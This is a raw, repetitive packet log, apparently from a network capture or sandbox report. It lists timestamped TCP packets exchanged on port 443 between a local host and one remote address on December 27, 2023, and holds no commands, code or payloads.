Dec 27, 2023 17:57:21.613190889 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.613377094 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.613390923 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.613428116 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.613435030 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.613465071 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.613831043 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.613852024 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.613882065 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.613888025 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.613915920 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.613928080 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.613933086 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.614104033 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.614106894 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.614115000 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.614130020 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.614176035 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.614183903 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.614195108 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.614207029 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.614212036 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.614223957 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.614228964 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.614263058 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.614289045 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.614379883 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.614394903 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.614433050 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.614438057 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.614473104 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.614490986 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.614720106 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.614737034 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.614777088 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.614784002 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.614794016 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.614806890 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.614815950 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.614820004 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.614829063 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.614856958 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.614886999 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.615096092 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.615113020 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.615156889 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.615163088 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.615175962 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.615187883 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.615200996 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.615206957 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.615220070 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.615226984 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.615263939 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.615293026 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.615413904 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.615432024 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.615470886 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.615475893 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.615505934 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.615521908 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.774609089 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.774640083 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.774682999 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.774708033 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.774722099 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.774723053 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.774749041 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.774751902 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.774763107 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.774770975 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.774802923 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.774817944 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.774837971 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.774844885 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.774868011 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.774878025 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.774904013 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.774908066 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.774919987 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.774928093 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.774943113 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.774950981 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.774962902 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.774977922 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775003910 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775005102 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775018930 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775028944 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775034904 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775057077 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775069952 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775082111 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775094032 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775105000 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775119066 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775136948 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775161982 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775168896 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775182962 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775229931 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775242090 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775254011 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775259972 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775279999 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775306940 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775316954 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775332928 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775372982 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775372982 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775382996 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775396109 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775403023 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775417089 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775434017 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775439024 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775461912 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775464058 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775480032 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775516033 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775521994 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775546074 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775677919 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775696993 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775727034 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775737047 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775752068 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775798082 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775810957 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775850058 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.775857925 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.775866985 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776113987 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776134014 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776156902 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776169062 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776190996 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776196003 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776211977 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776249886 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776256084 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776266098 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776267052 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776288033 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776319027 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776324987 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776335001 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776340008 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776355982 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776377916 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776384115 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776401997 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776407957 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776421070 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776433945 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776438951 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776462078 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776487112 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776554108 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776575089 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776608944 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776616096 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776639938 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776730061 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776757002 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776779890 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776786089 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776803970 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776809931 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776822090 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776855946 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776861906 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776886940 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776911020 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776931047 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776967049 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.776973009 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.776983023 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.777124882 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.777137995 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.777178049 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.777185917 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.777206898 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.777313948 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.777333975 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.777365923 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.777374029 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.777396917 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.777446985 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.777460098 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.777498007 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.777503967 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.777515888 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.778353930 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.778373957 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.778408051 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.778414965 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.778436899 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.778438091 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.778454065 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.778501987 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.778511047 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.814213037 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.814234018 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.814270020 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.814281940 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.814311981 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.838805914 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.840137005 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.914350986 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914381027 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914439917 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914443016 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.914455891 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914473057 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914503098 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.914510965 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914520979 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914521933 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.914545059 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914583921 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.914592981 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914608955 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.914635897 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914658070 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914690971 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.914701939 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914712906 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914721966 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.914731026 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914761066 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.914767027 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914777040 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914792061 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.914798021 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914824009 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.914829969 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914853096 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.914880991 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.914952993 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.914968967 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915014029 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.915019989 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915031910 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.915060997 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.915287971 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915303946 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915345907 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.915350914 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915363073 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915379047 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.915384054 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915390968 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.915396929 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915426016 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.915442944 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915457010 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915460110 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.915469885 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915493011 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.915515900 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.915550947 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915569067 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915606022 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915631056 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.915631056 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.915638924 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915656090 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.915662050 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.915688992 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.915746927 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915764093 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915796041 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.915803909 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915818930 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915831089 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.915841103 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915872097 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.915880919 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.915899992 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.916043043 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.916058064 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.916100025 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.916105986 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.916121006 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.916137934 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.916141033 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.916177034 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.916183949 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.916194916 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.916517973 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.916532993 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.916569948 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.916577101 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.916587114 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.916599989 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.916608095 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.916625977 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.916631937 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.916642904 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.916666031 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.916691065 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.916707039 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.916744947 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.916753054 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.916775942 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.917005062 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917028904 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917053938 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.917059898 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917085886 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.917221069 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917234898 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917279959 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.917280912 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917294979 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917300940 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.917329073 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.917362928 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.917468071 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917481899 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917520046 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.917526007 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917537928 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.917560101 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.917704105 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917718887 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917759895 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.917766094 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917788982 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.917803049 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.917824984 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917843103 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917876005 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.917881966 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917892933 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917908907 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.917913914 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.917931080 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.917937040 CET	443	49737	52.217.163.105	192.168.2.4
